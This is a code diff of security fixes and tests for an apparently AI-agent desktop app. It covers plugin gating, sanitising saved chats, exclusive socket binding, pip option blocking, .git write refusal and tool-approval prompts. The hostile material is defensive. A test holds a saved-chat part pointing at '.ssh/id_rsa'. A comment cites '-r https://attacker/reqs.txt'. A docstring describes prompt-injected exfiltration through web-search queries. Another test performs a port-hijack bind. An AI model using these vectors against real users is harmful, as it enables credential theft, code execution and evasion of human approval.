+++ b/backend/tests/test_plugin_sdk.py
@@ -287,7 +287,7 @@ def test_host_context_register_intent_same_plugin_name_reuse_raises():
 
 
 def test_host_context_register_builtin_plugin_stores_a_real_spec():
-    host = HostContext("some_plugin")
+    host = HostContext("web_research")  # a first-party id (register_builtin_plugin is first-party only)
 
     def _handler(document, run_ctx, parent_node_id):
         return "unused-in-this-test"
@@ -299,15 +299,52 @@ def test_host_context_register_builtin_plugin_stores_a_real_spec():
 
     assert len(host._builtin_actions) == 1
     spec = host._builtin_actions["Some Action"]
-    assert spec.plugin_id == "some_plugin"
+    assert spec.plugin_id == "web_research"
     assert spec.name == "Some Action"
     assert spec.description == "does a thing"
     assert spec.category == "More Plugins"
     assert spec.handler is _handler
 
 
+def test_register_builtin_plugin_is_refused_for_a_non_first_party_plugin():
+    """SECURITY-FIX: register_builtin_plugin attaches a picker action that
+    _execute_discovered_plugin runs UN-gated by any install-time grant and
+    that is invisible in Settings > Plugins - fine for the 8 first-party
+    built-ins it exists to migrate, but it was a public method any plugin
+    could call. A third-party plugin is now refused at registration."""
+    host = HostContext("some_third_party_plugin")
+    with pytest.raises(PluginRegistrationError, match="first-party"):
+        host.register_builtin_plugin(
+            name="Sneaky", description="looks helpful", category="Branch Foundations",
+            handler=lambda d, r, p: None,
+        )
+    assert host._builtin_actions == {}
+
+
+def test_a_third_party_plugin_using_the_builtin_hatch_becomes_a_load_error_at_discovery(tmp_path):
+    py_body = (
+        "from backend.plugin_sdk import HostContext\n\n\n"
+        "def register(host: HostContext) -> None:\n"
+        "    host.register_builtin_plugin(\n"
+        "        name='Helpful Thing', description='d', category='Branch Foundations',\n"
+        "        handler=lambda d, r, p: None,\n"
+        "    )\n"
+    )
+    _write_plugin(tmp_path, "sneaky", py_body=py_body, toml_body=None)
+
+    registry = discover_plugins(tmp_path)
+
+    # Refused at the source: no builtin action, no picker row, surfaced as a
+    # load error rather than a silently-registered, consent-invisible action.
+    assert registry.builtin_actions == {}
+    assert registry.resolve_builtin_action("Helpful Thing") is None
+    assert len(registry.load_errors) == 1
+    assert registry.load_errors[0].plugin_dir == "sneaky"
+    assert "first-party" in registry.load_errors[0].message
+
+
 def test_host_context_register_builtin_plugin_same_plugin_name_reuse_raises():
-    host = HostContext("some_plugin")
+    host = HostContext("web_research")
     host.register_builtin_plugin(
         name="Dup", description="d", category="More Plugins", handler=lambda d, r, p: None,
     )
@@ -324,14 +361,18 @@ def test_builtin_action_name_collision_between_two_plugins_is_recorded_first_win
     # sorted glob() ordering is deterministic.
     py_body_a = "from backend.plugin_sdk import HostContext\n\n\ndef register(host: HostContext) -> None:\n    host.register_builtin_plugin(name='Shared Builtin', description='a', category='More Plugins', handler=lambda d, r, p: None)\n"
     py_body_b = "from backend.plugin_sdk import HostContext\n\n\ndef register(host: HostContext) -> None:\n    host.register_builtin_plugin(name='Shared Builtin', description='b', category='More Plugins', handler=lambda d, r, p: None)\n"
-    _write_plugin(tmp_path, "plugin_a", dir_name="plugin_a", py_body=py_body_a, toml_body=None)
-    _write_plugin(tmp_path, "plugin_b", dir_name="plugin_b", py_body=py_body_b, toml_body=None)
+    # First-party ids only (register_builtin_plugin is first-party only),
+    # and discovery requires dir == id, so the ids ARE the dir names and
+    # drive the sorted-glob order: "gitlink" < "web_research", so gitlink
+    # is discovered first and wins the shared name.
+    _write_plugin(tmp_path, "gitlink", py_body=py_body_a, toml_body=None)
+    _write_plugin(tmp_path, "web_research", py_body=py_body_b, toml_body=None)
 
     registry = discover_plugins(tmp_path)
 
     assert len(registry.load_errors) == 1
-    assert registry.load_errors[0].plugin_dir == "plugin_b"
-    assert registry.builtin_actions["Shared Builtin"].plugin_id == "plugin_a"
+    assert registry.load_errors[0].plugin_dir == "web_research"
+    assert registry.builtin_actions["Shared Builtin"].plugin_id == "gitlink"
 
 
 def test_builtin_action_name_collision_with_a_picker_entry_name_is_recorded(tmp_path):
@@ -339,13 +380,16 @@ def test_builtin_action_name_collision_with_a_picker_entry_name_is_recorded(tmp_
     # register_picker_entry name (from a different plugin) must be
     # rejected too - one flat name space across both mechanisms.
     py_body_builtin = "from backend.plugin_sdk import HostContext\n\n\ndef register(host: HostContext) -> None:\n    host.register_builtin_plugin(name='Shared Name', description='b', category='More Plugins', handler=lambda d, r, p: None)\n"
-    _write_plugin(tmp_path, "plugin_a", dir_name="plugin_a", kind="greet", picker_name="Shared Name")
-    _write_plugin(tmp_path, "plugin_b", dir_name="plugin_b", py_body=py_body_builtin, toml_body=None)
+    _write_plugin(tmp_path, "plugin_a", kind="greet", picker_name="Shared Name")
+    # Builtin plugin must be first-party; "web_research" sorts after
+    # "plugin_a" so the picker entry is registered first and the builtin
+    # collision is the one recorded as an error.
+    _write_plugin(tmp_path, "web_research", py_body=py_body_builtin, toml_body=None)
 
     registry = discover_plugins(tmp_path)
 
     assert len(registry.load_errors) == 1
-    assert registry.load_errors[0].plugin_dir == "plugin_b"
+    assert registry.load_errors[0].plugin_dir == "web_research"
     assert registry.picker_entries["Shared Name"].plugin_id == "plugin_a"
     assert "Shared Name" not in registry.builtin_actions
 
@@ -359,13 +403,13 @@ def test_resolve_builtin_action_returns_none_for_unknown_name(tmp_path):
         "        handler=lambda d, r, p: None,\n"
         "    )\n"
     )
-    _write_plugin(tmp_path, "some_plugin", py_body=py_body, toml_body=None)
+    _write_plugin(tmp_path, "web_research", py_body=py_body, toml_body=None)
 
     registry = discover_plugins(tmp_path)
 
     resolved = registry.resolve_builtin_action("Real")
     assert resolved is not None
-    assert resolved.plugin_id == "some_plugin"
+    assert resolved.plugin_id == "web_research"
     assert registry.resolve_builtin_action("Nope") is None
 
 

--- a/backend/tests/test_session_load.py
+++ b/backend/tests/test_session_load.py
@@ -965,3 +965,40 @@ def test_restore_final_deliverable_node_id_rejects_a_resolved_non_chat_node():
         final_deliverable_node_id="code-1",
     )
     assert document.final_deliverable_node_id is None
+
+
+# -- SECURITY-FIX: a persisted audio_file part is an arbitrary local path the
+# -- provider layer would read and upload; neutralized on load ----------------
+
+
+def test_restored_audio_file_part_is_neutralized_not_left_as_a_readable_path():
+    """A hostile saved chat carrying {"type":"audio_file","path":<any local
+    file>} is invisible in the UI and would be read + uploaded to the model
+    provider on the next turn. Restore must strip the path to an inert
+    placeholder."""
+    document = _restore(nodes=[{
+        "node_type": "chat",
+        "raw_content": [
+            {"type": "text", "text": "look at this"},
+            {"type": "audio_file", "path": "C:/Users/victim/.ssh/id_rsa"},
+        ],
+        "position": {"x": 0, "y": 0},
+    }])
+    node = next(iter(document.nodes.values()))
+    parts = node.state.content_parts
+    assert all(p.get("type") != "audio_file" for p in parts), "the audio_file path must not survive load"
+    serialized = repr(parts)
+    assert "id_rsa" not in serialized and ".ssh" not in serialized, "the arbitrary path must be gone entirely"
+    # The ordinary text part is untouched.
+    assert any(p.get("type") == "text" and p.get("text") == "look at this" for p in parts)
+
+
+def test_restored_image_bytes_part_still_round_trips_unaffected_by_the_audio_fix():
+    import base64
+    from backend.domain.content_codec import _content_codec
+
+    raw = _content_codec.process_content_for_deserialization([
+        {"type": "image_bytes", "data": base64.b64encode(b"PNGDATA").decode("ascii")},
+    ])
+    assert raw[0]["type"] == "image_bytes"
+    assert raw[0]["data"] == b"PNGDATA"

--- a/backend/tests/test_session_load.py
+++ b/backend/tests/test_session_load.py
@@ -1002,3 +1002,38 @@ def test_restored_image_bytes_part_still_round_trips_unaffected_by_the_audio_fix
     ])
     assert raw[0]["type"] == "image_bytes"
     assert raw[0]["data"] == b"PNGDATA"
+
+
+# -- SECURITY-FIX: non-finite floats from a hostile saved chat must not reach
+# -- the live document (they'd emit NaN/Infinity tokens that wedge the wire) --
+
+
+def test_non_finite_position_is_sanitized_on_load_not_carried_into_the_document():
+    import json
+    import math
+
+    # json.loads accepts these non-standard literals by default.
+    raw = json.loads('{"x": NaN, "y": Infinity}')
+    document = _restore(nodes=[{
+        "node_type": "chat", "raw_content": "hi", "position": raw,
+    }])
+    node = next(iter(document.nodes.values()))
+    assert math.isfinite(node.x) and math.isfinite(node.y), (
+        "a non-finite coordinate must be coerced to a finite default on load"
+    )
+
+
+def test_a_chat_with_non_finite_values_still_serializes_to_valid_json_for_the_wire():
+    import json
+
+    document = _restore(
+        nodes=[{"node_type": "chat", "raw_content": "hi",
+                "position": json.loads('{"x": NaN, "y": -Infinity}')}],
+        view_state={"zoom_factor": float("inf"), "scroll_x": float("nan"), "scroll_y": 0.0},
+    )
+    # Exactly what starlette's send_json does (separators + default allow_nan
+    # would emit bare NaN/Infinity tokens the SPA's JSON.parse rejects).
+    wire = json.dumps(document.scene_payload(), separators=(",", ":"), allow_nan=False)
+    # allow_nan=False raises if any non-finite survived - reaching here proves
+    # none did. Belt-and-suspenders: no literal token slipped through either.
+    assert "NaN" not in wire and "Infinity" not in wire

--- a/backend/tests/test_settings.py
+++ b/backend/tests/test_settings.py
@@ -294,6 +294,41 @@ def test_a_non_numeric_schema_version_is_backfilled_not_crashed_on(tmp_path, cor
     assert json.loads(state_file.read_text(encoding="utf-8"))["schema_version"] == SettingsManager.CURRENT_SCHEMA_VERSION
 
 
+@pytest.mark.parametrize("corrupt_root", ["[]", '"just a string"', "42", "null", "true"])
+def test_a_non_object_settings_file_is_treated_as_corrupt_not_crashed_on(tmp_path, corrupt_root):
+    # SECURITY-FIX: json.load returns a non-dict for a syntactically valid
+    # file whose root is a list/string/number/null - the migrations then do
+    # `key in state` / `state[key] = ...` and raise TypeError, which
+    # _load_state's except (JSONDecodeError/UnicodeDecodeError/IOError only)
+    # does NOT catch, crashing the app at boot on every launch. A wrong-
+    # typed root is corruption and must take the backup-and-replace path.
+    state_file = tmp_path / "session.dat"
+    state_file.write_text(corrupt_root, encoding="utf-8")
+
+    manager = SettingsManager(state_file)  # must not raise
+
+    assert manager.get_schema_version() == SettingsManager.CURRENT_SCHEMA_VERSION
+    # A .corrupted-* backup of the bad file is left behind, same as for
+    # unparseable bytes.
+    assert any(p.name.startswith("session.dat.corrupted") for p in tmp_path.iterdir())
+
+
+def test_a_non_dict_api_models_field_does_not_crash_the_migration(tmp_path):
+    # SECURITY-FIX: migration_002 did dict(state.get("api_models", {}) or {}),
+    # which raised ValueError for a non-empty list ("dictionary update
+    # sequence element #0 has length N"), escaping _load_state uncaught.
+    import json
+
+    state_file = tmp_path / "session.dat"
+    state_file.write_text(json.dumps({"api_models": ["gpt-4", "gpt-5"]}), encoding="utf-8")
+
+    manager = SettingsManager(state_file)  # must not raise
+
+    # The wrong-typed field falls back to an empty models dict rather than
+    # crashing, and the store is usable.
+    assert isinstance(manager.get_api_models(), dict)
+
+
 # -- ADR-009 stage 9.1: scattered `if 'field' not in state` backfills refactored
 # -- into an explicit, ordered migration chain (graphlink_migrations.
 # -- run_dict_migrations). These are before/after equivalence tests: loading an

--- a/backend/tools.py
+++ b/backend/tools.py
@@ -175,6 +175,17 @@ class ToolRegistry:
         registration = self._registrations.get(name)
         return frozenset(registration.scopes) if registration is not None else None
 
+    def approval_for(self, name: str) -> str | None:
+        """The approval policy `name` was registered with ("auto" | "once" |
+        "always"), or None for an unknown tool. SECURITY-FIX: builder.py's
+        autopilot router used to decide purely on scopes_for(), never
+        reading this - so a tool registered approval="always" precisely
+        because its effect is destructive (graph.delete_node) was
+        auto-approved in autopilot like any other graph.mutate tool. The
+        router now refuses to auto-approve an "always" tool in any mode."""
+        registration = self._registrations.get(name)
+        return registration.approval if registration is not None else None
+
     def specs(self) -> tuple[ToolSpec, ...]:
         """Every registered tool's neutral spec, in registration order - what
         a caller passes as ChatRequest.tools for a run granted access to all

--- a/backend/tools_graph.py
+++ b/backend/tools_graph.py
@@ -265,6 +265,37 @@ def run_node_pending_code(document: SceneDocument, call: ToolCall) -> str | None
     return node.state.pycoder_code
 
 
+def run_node_pending_disclosure(document: SceneDocument, call: ToolCall) -> str | None:
+    """SECURITY-FIX: the human-readable thing a run_node call is about to DO
+    that its own arguments ({node_id, action}) don't reveal - so the
+    approval prompt can disclose it. Two cases today:
+
+    - execute: the pycoder code (delegated to run_node_pending_code).
+    - research: the web_research node's content IS the search query that
+      gets sent to the external search/fetch provider (net.fetch, which
+      always prompts even in autopilot). The query lived only on the node,
+      so the approval summary showed 'run_node {"action":"research",...}'
+      and the approver blessed an outbound network request without seeing
+      what was being searched for - a query the model composed from canvas
+      content it may have been prompt-injected through, i.e. an exfiltration
+      channel the human had no chance to catch.
+
+    Returns None for any other call, leaving the plain-arguments summary."""
+    code = run_node_pending_code(document, call)
+    if code is not None:
+        return "will run this code:\n" + code
+    if call.name != "run_node":
+        return None
+    node = document.nodes.get(str(call.arguments.get("node_id") or ""))
+    if node is None or node.kind != "web_research":
+        return None
+    action = str(call.arguments.get("action") or "") or _RUN_NODE_DEFAULT_ACTIONS.get(node.kind, "")
+    if action != "research":
+        return None
+    query = (node.content or "").strip()
+    return "will search the web for:\n" + query if query else None
+
+
 def _run_id_of(ctx: RunContext) -> str | None:
     """The builder's BuilderRunContext carries run_id; a bare RunContext
     (tests, a future non-builder caller) does not - unstamped is the

--- a/graphlink_desktop.py
+++ b/graphlink_desktop.py
@@ -53,10 +53,41 @@ logger = logging.getLogger("graphlink.desktop")
 STARTUP_TIMEOUT_SECONDS = 15.0
 
 
-def _free_port() -> int:
-    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as probe:
-        probe.bind(("127.0.0.1", 0))
-        return probe.getsockname()[1]
+def _bind_listener(port: int | None) -> socket.socket:
+    """Binds the backend's loopback listener ONCE, exclusively, and hands the
+    live socket to uvicorn (see _start_backend) instead of probing a free
+    port, closing it, and letting uvicorn re-bind it by number.
+
+    SECURITY-FIX: that probe-close-rebind sequence had two holes, both
+    reachable by any other process running as the same user (threat (a) in
+    backend/auth.py's model). uvicorn's own bind_socket() sets SO_REUSEADDR
+    and never SO_EXCLUSIVEADDRUSE; on Windows SO_REUSEADDR means a second
+    socket may bind the exact same (127.0.0.1, port) with NO error, and the
+    kernel delivers new connections to one binder only. So an attacker who
+    bound the port first - predictable when GRAPHLINK_BACKEND_PORT pins it,
+    or by winning the probe-close window otherwise - silently received the
+    WebView2's requests, each carrying the per-launch capability token that
+    ADR-004 exists to keep from exactly that attacker, and could serve its
+    own page into the address-bar-less window. uvicorn logged "listening"
+    as normal, so the hijack was invisible to the app and the user.
+
+    SO_EXCLUSIVEADDRUSE is the Windows flag that refuses a bind when the
+    address is already held by anyone, and makes a later SO_REUSEADDR bind
+    by someone else fail too; binding here and keeping the socket open
+    removes the rebind window entirely. On POSIX, SO_REUSEADDR does not
+    permit stealing a live listener, so the flag is simply not applied
+    there. port=None asks the kernel for any free port, which is then read
+    back from the bound socket rather than re-derived."""
+    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    try:
+        if hasattr(socket, "SO_EXCLUSIVEADDRUSE"):
+            listener.setsockopt(socket.SOL_SOCKET, socket.SO_EXCLUSIVEADDRUSE, 1)
+        listener.bind(("127.0.0.1", port or 0))
+        listener.listen(128)
+    except OSError:
+        listener.close()
+        raise
+    return listener
 
 
 def _wait_for_health(
@@ -95,7 +126,10 @@ def _wait_for_health(
 
 
 def _start_backend(
-    port: int, previous_run_crashed: bool = False, auth_token: str | None = None
+    port: int,
+    previous_run_crashed: bool = False,
+    auth_token: str | None = None,
+    listener: socket.socket | None = None,
 ) -> tuple[uvicorn.Server, threading.Thread]:
     import uvicorn
 
@@ -112,7 +146,15 @@ def _start_backend(
         # _shutdown_backend below.
     )
     server = uvicorn.Server(config)
-    thread = threading.Thread(target=server.run, name="graphlink-backend", daemon=True)
+    # `listener` is the already-bound, exclusive socket from _bind_listener
+    # - passed through so uvicorn serves on THAT socket (host/port above are
+    # then only what it logs) rather than binding a fresh SO_REUSEADDR one
+    # by number. uvicorn closes it on shutdown. None keeps the old
+    # bind-by-number path for callers that have no socket to hand over.
+    sockets = [listener] if listener is not None else None
+    thread = threading.Thread(
+        target=server.run, kwargs={"sockets": sockets}, name="graphlink-backend", daemon=True,
+    )
     thread.start()
     return server, thread
 
@@ -179,14 +221,24 @@ def main() -> int:
 
     raw_port = os.environ.get("GRAPHLINK_BACKEND_PORT")
     try:
-        port = int(raw_port) if raw_port else _free_port()
+        requested_port: int | None = int(raw_port) if raw_port else None
     except ValueError:
         # Guarded so a bad env value can't raise here, AFTER mark_running()
         # has already written the crash sentinel above - an uncaught raise
         # at this point used to skip mark_clean_exit() entirely, leaving a
         # false "previous run crashed" notice on the NEXT launch.
         logger.warning("GRAPHLINK_BACKEND_PORT=%r is not a valid port, ignoring", raw_port)
-        port = _free_port()
+        requested_port = None
+    try:
+        listener = _bind_listener(requested_port)
+    except OSError as exc:
+        # A pinned port already held by another process is exactly what the
+        # exclusive bind is supposed to refuse - fail loudly here instead of
+        # letting a silent hijack proceed, and still clear the sentinel.
+        logger.error("could not bind the backend listener on 127.0.0.1:%s: %s", requested_port or 0, exc)
+        mark_clean_exit()
+        return 1
+    port = listener.getsockname()[1]
     base_url = f"http://127.0.0.1:{port}"
 
     # ADR-004 stage 4.1: one fresh capability token per launch, never
@@ -196,7 +248,7 @@ def main() -> int:
     auth_token = mint_token()
 
     server, backend_thread = _start_backend(
-        port, previous_run_crashed=crashed, auth_token=auth_token
+        port, previous_run_crashed=crashed, auth_token=auth_token, listener=listener
     )
     if not _wait_for_health(
         base_url, STARTUP_TIMEOUT_SECONDS, thread=backend_thread, auth_token=auth_token

--- a/graphlink_plugins/code_sandbox/domain.py
+++ b/graphlink_plugins/code_sandbox/domain.py
@@ -112,6 +112,53 @@ _PIP_OPTION_LINE_PREFIXES = (
     "--no-build-isolation",
 )
 
+# SECURITY-FIX: option lines that DEFEAT or ROUTE AROUND the --only-binary
+# :all: guard, so they are unsafe whenever source builds are off even though
+# they are not package specifiers. Checked before the generic option skip
+# above, since every one of these is also in _PIP_OPTION_LINE_PREFIXES:
+#
+# - `--no-binary` in a requirements file is applied by pip AFTER the CLI's
+#   --only-binary :all: (both feed one FormatControl; the later write wins,
+#   and `:all:` on either side clears the other), so a single
+#   `--no-binary :all:` line in the manifest silently re-enables sdist
+#   builds for every package while the approval panel still shows source
+#   builds as off.
+# - `-r`/`--requirement` and `-c`/`--constraint` make pip read ANOTHER file
+#   (a local path, or a URL pip fetches itself) whose lines never pass
+#   through _direct_reference_requirement_lines at all - a one-line
+#   `-r https://attacker/reqs.txt` smuggles in any `pkg @ file://` or
+#   `-e` line this whole check exists to stop.
+# - `--global-option`/`--install-option`/`--config-settings`/
+#   `--no-build-isolation` only do anything during a source build, which
+#   is exactly what is supposed to be impossible here; there is no
+#   legitimate reason for a manifest to carry them while builds are off,
+#   and refusing them closes the "build happens anyway via one of the
+#   holes above, and now also runs with attacker-chosen build flags"
+#   combination.
+#
+# Everything else on the skip list (index/find-links/trusted-host/hash/
+# no-deps/pre/prefer-binary/...) selects WHERE a wheel comes from, not
+# whether code runs before the user's approved script does, and stays
+# allowed - the existing end-to-end tests' `--find-links <dir>` /
+# `--no-index` manifests depend on that.
+_GUARD_DEFEATING_OPTION_PREFIXES = (
+    "--no-binary",
+    "-r", "--requirement",
+    "-c", "--constraint",
+    "--global-option",
+    "--install-option",
+    "--config-settings",
+    "--no-build-isolation",
+)
+
+
+def _option_name(line):
+    """The option token itself, split from its value whether written
+    `--opt value`, `--opt=value`, or `-r value`, so `--no-binary` cannot be
+    confused with a hypothetical `--no-binary-something`."""
+    head = re.split(r"[\s=]", line, maxsplit=1)[0]
+    return head
+
 
 def _direct_reference_requirement_lines(normalized_requirements):
     """Returns the requirements-file lines that name a package by direct
@@ -152,6 +199,11 @@ def _direct_reference_requirement_lines(normalized_requirements):
         if not line:
             continue
         if line.startswith(("-e", "--editable")):
+            unsafe_lines.append(raw_line.strip())
+            continue
+        if line.startswith("-") and _option_name(line) in _GUARD_DEFEATING_OPTION_PREFIXES:
+            # See _GUARD_DEFEATING_OPTION_PREFIXES - must run before the
+            # generic option skip just below, which would wave it through.
             unsafe_lines.append(raw_line.strip())
             continue
         if line.startswith(_PIP_OPTION_LINE_PREFIXES):
@@ -443,11 +495,13 @@ class VirtualEnvSandbox:
                 raise RuntimeError(
                     "Dependency installation blocked: the requirements list "
                     "contains a direct URL, editable (-e), or local-path "
-                    "reference. Pip builds that reference using its own "
-                    "code regardless of --only-binary :all:, so this cannot "
-                    "be installed without explicitly allowing source "
-                    "builds. Enable \"Allow source builds\" to install it, "
-                    "or remove the line(s) below:\n" + offending
+                    "reference, or a pip option (--no-binary, -r/-c, "
+                    "--global-option, --config-settings, ...) that would "
+                    "let a package's own build code run regardless of "
+                    "--only-binary :all:. This cannot be installed without "
+                    "explicitly allowing source builds. Enable \"Allow "
+                    "source builds\" to install it, or remove the line(s) "
+                    "below:\n" + offending
                 )
         manifest_hash = hashlib.sha256(normalized.encode("utf-8")).hexdigest()
         previous_hash = self.requirements_hash_file.read_text(encoding="utf-8").strip() if self.requirements_hash_file.exists() else ""

--- a/graphlink_plugins/gitlink/agent.py
+++ b/graphlink_plugins/gitlink/agent.py
@@ -101,6 +101,22 @@ def _normalize_repo_path(path_text):
     # segment loudly instead of letting it collapse silently.
     if any(":" in part for part in normalized.parts):
         raise RuntimeError("Repository paths must stay inside the selected repository.")
+    # SECURITY-FIX: the containment guards above (and _safe_local_target's
+    # resolve() check below) keep a path INSIDE local_root, but said nothing
+    # about WHICH subtree - so ".git/hooks/pre-commit" or ".git/config"
+    # passed every check and apply_change_set wrote them verbatim. A hook,
+    # or a core.fsmonitor / alias line in .git/config, is arbitrary code
+    # execution on the user's very next git command, entirely outside this
+    # app's approval model (the Apply diff shows the file, but a reviewer
+    # skimming a plausible multi-file change has no reason to read a
+    # ".git/config" hunk as "this runs a program"). A "propose source edits"
+    # feature has no legitimate reason to touch .git at all - the read side
+    # already excludes it (repository.py's IGNORED_LOCAL_DIR_NAMES), so the
+    # write side now refuses it categorically too. Case-insensitive, since
+    # NTFS/APFS would alias ".GIT" onto the same directory; and every
+    # segment, not just the first, so a submodule's nested .git is covered.
+    if any(part.lower() == ".git" for part in normalized.parts):
+        raise RuntimeError("Repository paths may not reference the .git directory.")
     return normalized.as_posix()
 
 

--- a/graphlink_settings_store.py
+++ b/graphlink_settings_store.py
@@ -378,8 +378,17 @@ class SettingsManager:
         api_models all already being present, which migration "1" above
         guarantees by running first."""
         if 'api_models_by_provider' not in state or not isinstance(state.get('api_models_by_provider'), dict):
+            # SECURITY-FIX: dict(state.get('api_models', {}) or {}) raised an
+            # uncaught ValueError when a hand-corrupted/hostile session.dat
+            # carried a non-empty list for api_models ("dictionary update
+            # sequence element #0 has length N"), escaping _load_state's own
+            # corrupt-file handling and crashing the app at boot. A wrong-
+            # typed api_models is corruption, not data - fall back to the
+            # same empty default a missing field gets, rather than raising.
+            raw_api_models = state.get('api_models', {})
+            seed_models = dict(raw_api_models) if isinstance(raw_api_models, dict) else {}
             state['api_models_by_provider'] = {
-                str(state.get('api_provider', 'OpenAI-Compatible')): dict(state.get('api_models', {}) or {})
+                str(state.get('api_provider', 'OpenAI-Compatible')): seed_models
             }
         self._migrate_model_settings(state)
         return state
@@ -477,6 +486,23 @@ class SettingsManager:
                 raw_state = json.load(f)
         except (json.JSONDecodeError, UnicodeDecodeError, IOError) as e:
             self._backup_corrupt_state_file(e)
+            return self._create_initial_state()
+
+        # SECURITY-FIX: json.load happily returns a non-dict top level for a
+        # syntactically valid file whose root is `[]`, `"x"`, `42`, or
+        # `null`. The migrations below immediately do `key in state` /
+        # `state[key] = ...` and raise TypeError on any of those, which the
+        # except above (JSONDecodeError/UnicodeDecodeError/IOError only) does
+        # NOT catch - so a hostile or hand-corrupted session.dat crashed the
+        # whole app at construction (backend/app.py create_app, and earlier
+        # graphlink_desktop.main) on every launch, the exact permanent-boot-
+        # failure this region's own comments say must never happen. A wrong-
+        # typed root is corruption just like unparseable bytes are, so it
+        # takes the same backup-and-replace path rather than a raise.
+        if not isinstance(raw_state, dict):
+            self._backup_corrupt_state_file(
+                TypeError(f"session.dat root is {type(raw_state).__name__}, expected object")
+            )
             return self._create_initial_state()
 
         # ADR-009 stage 9.1: every backfill above now runs through

--- a/tests/test_graphlink_desktop.py
+++ b/tests/test_graphlink_desktop.py
@@ -173,6 +173,9 @@ def desktop_harness(tmp_path, monkeypatch):
         webview_start_side_effect=None,
         wait_for_health_result=True,
         start_backend_auth_tokens=[],
+        start_backend_listeners=[],
+        bind_listener_requests=[],
+        bind_listener_error=None,
         wait_for_health_auth_tokens=[],
         sweep_scratch_calls=0,
         sweep_scratch_side_effect=None,
@@ -226,13 +229,38 @@ def desktop_harness(tmp_path, monkeypatch):
     fake_server = _FakeServer()
     fake_thread = _FakeThread(alive=True)
 
-    def fake_start_backend(port, previous_run_crashed=False, auth_token=None):
+    def fake_start_backend(port, previous_run_crashed=False, auth_token=None, listener=None):
         # ADR-004 stage 4.1: recorded, not ignored - the token main() mints
         # is exactly what test_main_always_starts_the_backend_with_a_
         # capability_token below asserts on, so "shipped with auth
         # accidentally disabled" is a test failure rather than silent.
         state.start_backend_auth_tokens.append(auth_token)
+        state.start_backend_listeners.append(listener)
         return fake_server, fake_thread
+
+    class _FakeListener:
+        """Stands in for _bind_listener's real socket so main() never binds
+        a live port under test - records the requested port and reports
+        it back (or a fixed fallback for port=None) via getsockname()."""
+
+        def __init__(self, requested):
+            self.requested = requested
+            self.port = requested if requested else 4242
+            self.closed = False
+
+        def getsockname(self):
+            return ("127.0.0.1", self.port)
+
+        def close(self):
+            self.closed = True
+
+    def fake_bind_listener(port):
+        state.bind_listener_requests.append(port)
+        if state.bind_listener_error is not None:
+            raise state.bind_listener_error
+        return _FakeListener(port)
+
+    monkeypatch.setattr(graphlink_desktop, "_bind_listener", fake_bind_listener)
 
     def fake_wait_for_health(base_url, timeout, thread=None, auth_token=None):
         state.wait_for_health_auth_tokens.append(auth_token)
@@ -426,3 +454,95 @@ def test_main_passes_the_token_to_the_window_as_a_url_fragment(desktop_harness):
     # the substring while losing the property.
     assert f"#token={token}" in url
     assert url.split("#", 1)[0].endswith("/"), "the fragment must not corrupt the page path"
+
+
+# -- SECURITY-FIX: exclusive listener bind, no probe-close-rebind window --------
+
+
+def test_bind_listener_refuses_a_port_another_process_already_holds_exclusively():
+    first = graphlink_desktop._bind_listener(None)
+    try:
+        port = first.getsockname()[1]
+        with pytest.raises(OSError):
+            graphlink_desktop._bind_listener(port)
+    finally:
+        first.close()
+
+
+@pytest.mark.skipif(not hasattr(__import__("socket"), "SO_EXCLUSIVEADDRUSE"), reason="Windows-only flag")
+def test_bind_listener_blocks_a_so_reuseaddr_hijack_of_the_live_port():
+    """The attack: uvicorn's own bind sets SO_REUSEADDR, which on Windows
+    lets a SECOND same-user socket bind the identical (127.0.0.1, port)
+    with no error and then receive the connections - and with them the
+    capability token. SO_EXCLUSIVEADDRUSE on our listener is what makes
+    that second bind fail."""
+    import socket
+
+    listener = graphlink_desktop._bind_listener(None)
+    try:
+        port = listener.getsockname()[1]
+        attacker = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        attacker.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+        try:
+            with pytest.raises(OSError):
+                attacker.bind(("127.0.0.1", port))
+        finally:
+            attacker.close()
+    finally:
+        listener.close()
+
+
+def test_bind_listener_without_exclusive_flag_is_hijackable_proving_the_flag_matters():
+    """Control for the test above: a plain SO_REUSEADDR listener (what
+    uvicorn creates on its own) DOES let the attacker's SO_REUSEADDR bind
+    succeed on Windows - so the protection really is the flag, not some
+    other property of the socket."""
+    import socket
+
+    if not hasattr(socket, "SO_EXCLUSIVEADDRUSE"):
+        pytest.skip("Windows-only semantics")
+    victim = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    victim.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+    victim.bind(("127.0.0.1", 0))
+    victim.listen(1)
+    port = victim.getsockname()[1]
+    attacker = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    attacker.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+    try:
+        attacker.bind(("127.0.0.1", port))  # succeeds: this is the hole
+    finally:
+        attacker.close()
+        victim.close()
+
+
+def test_main_hands_the_exclusive_listener_to_the_backend_and_derives_the_port_from_it(desktop_harness):
+    result = graphlink_desktop.main()
+
+    assert result == 0
+    assert desktop_harness.bind_listener_requests == [None], "no env pin -> kernel picks the port"
+    [listener] = desktop_harness.start_backend_listeners
+    assert listener is not None and listener.port == 4242
+    (_args, kwargs) = desktop_harness.webview_create_window_calls[0]
+    assert kwargs["url"].split("#", 1)[0].rstrip("/") == "http://127.0.0.1:4242", (
+        "the window URL must use the port the bound socket actually got, not a re-probed one"
+    )
+
+
+def test_main_pins_the_listener_to_the_env_port(desktop_harness, monkeypatch):
+    monkeypatch.setenv("GRAPHLINK_BACKEND_PORT", "54321")
+
+    graphlink_desktop.main()
+
+    assert desktop_harness.bind_listener_requests == [54321]
+
+
+def test_main_fails_loudly_and_clears_the_sentinel_when_the_pinned_port_is_taken(desktop_harness, monkeypatch):
+    monkeypatch.setenv("GRAPHLINK_BACKEND_PORT", "54321")
+    desktop_harness.bind_listener_error = OSError("address in use")
+
+    result = graphlink_desktop.main()
+
+    assert result == 1, "a held port must refuse to start, never silently share"
+    assert desktop_harness.mark_clean_exit_calls == 1
+    assert desktop_harness.start_backend_listeners == []
+    assert desktop_harness.webview_create_window_calls == []


### PR DESCRIPTION
## Problem

